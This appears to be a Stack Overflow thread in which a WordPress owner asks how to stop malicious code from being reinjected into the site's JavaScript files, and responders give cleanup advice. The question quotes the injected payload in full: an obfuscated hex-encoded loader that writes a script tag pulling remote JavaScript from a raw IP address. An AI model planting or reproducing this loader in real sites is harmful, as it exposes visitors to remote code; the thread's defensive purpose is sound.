-4

i have a theme based wordpress website, but since the past few days the website plugins are not working, the reason i found is that the ".js" extension files are being injected with the malicious code

var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]));

steps taken to avoid it

  • restricted permissions to write a file.
  • blocked ftp to be accessed by any other ip than mine.
  • tried removing the code from entire website.
  • uploaded the backup files. but still somehow the code keeps on getting injected in nearly all javascript files
Daljeet Dhaliwal
  • 223
  • 1
  • 2
  • 7
  • You probably have a vulnerable plugin. – SLaks Oct 24 '17 at 15:24
  • Your backup might be infected as well. Look at the access log and Look at any and all POST requests, that'll often produce an idea. – janh Oct 24 '17 at 15:35
  • keep in mind an attack of the sort usually injects several backdoors.... if you do not have a valid backup, you will need to comb through your files for blobs of php, js and foreign content. you will also need to look in the database for foreign content. it usually is very simple to spot, but long to find.It's tedious to say the least. after that, make sure your permissions are set to minimum, https://www.smashingmagazine.com/2014/05/proper-wordpress-filesystem-permissions-ownerships/ is a very thorough explanation of wordpress permissions (a bit on the overkill explanations, yes) – Ralph Thomas Hopper Oct 24 '17 at 15:43
  • once site is back clean, i suggest you get a cloudflare. they safeguards specifically designed for wordpress... and keep your wp and plugins up to date. if you are running low maintenance plugins or deprecated ones, find alternatives, its not worth the hassle – Ralph Thomas Hopper Oct 24 '17 at 15:45

2 Answers2

1

you have to find the file: "db.php" and remove the code infected. At the same time you have to delete all code infected in ".js" files. https://www.polaris64.net/blog/cyber-security/2017/wordpress-hacks-jquery-js-script-injection

AlbertoLasa
  • 66
  • 1
0

Right off, I think your backup may be corrupt. I don't know if it pre-dates your infection, but it is something to check. Also, try disabling/deleting plugins -- one could be vulnerable or infected. Look at the db.php and your .js files for infected code and remove it.

If your backup is bad, you'll have to go thru all the code to find the bad bits and remove them. Or, if you can take the time and have clean source content you could wipe the whole thing out and start over. It's a horrible thought, but sometimes that's the fix.

Gaby Weiss
  • 136
  • 4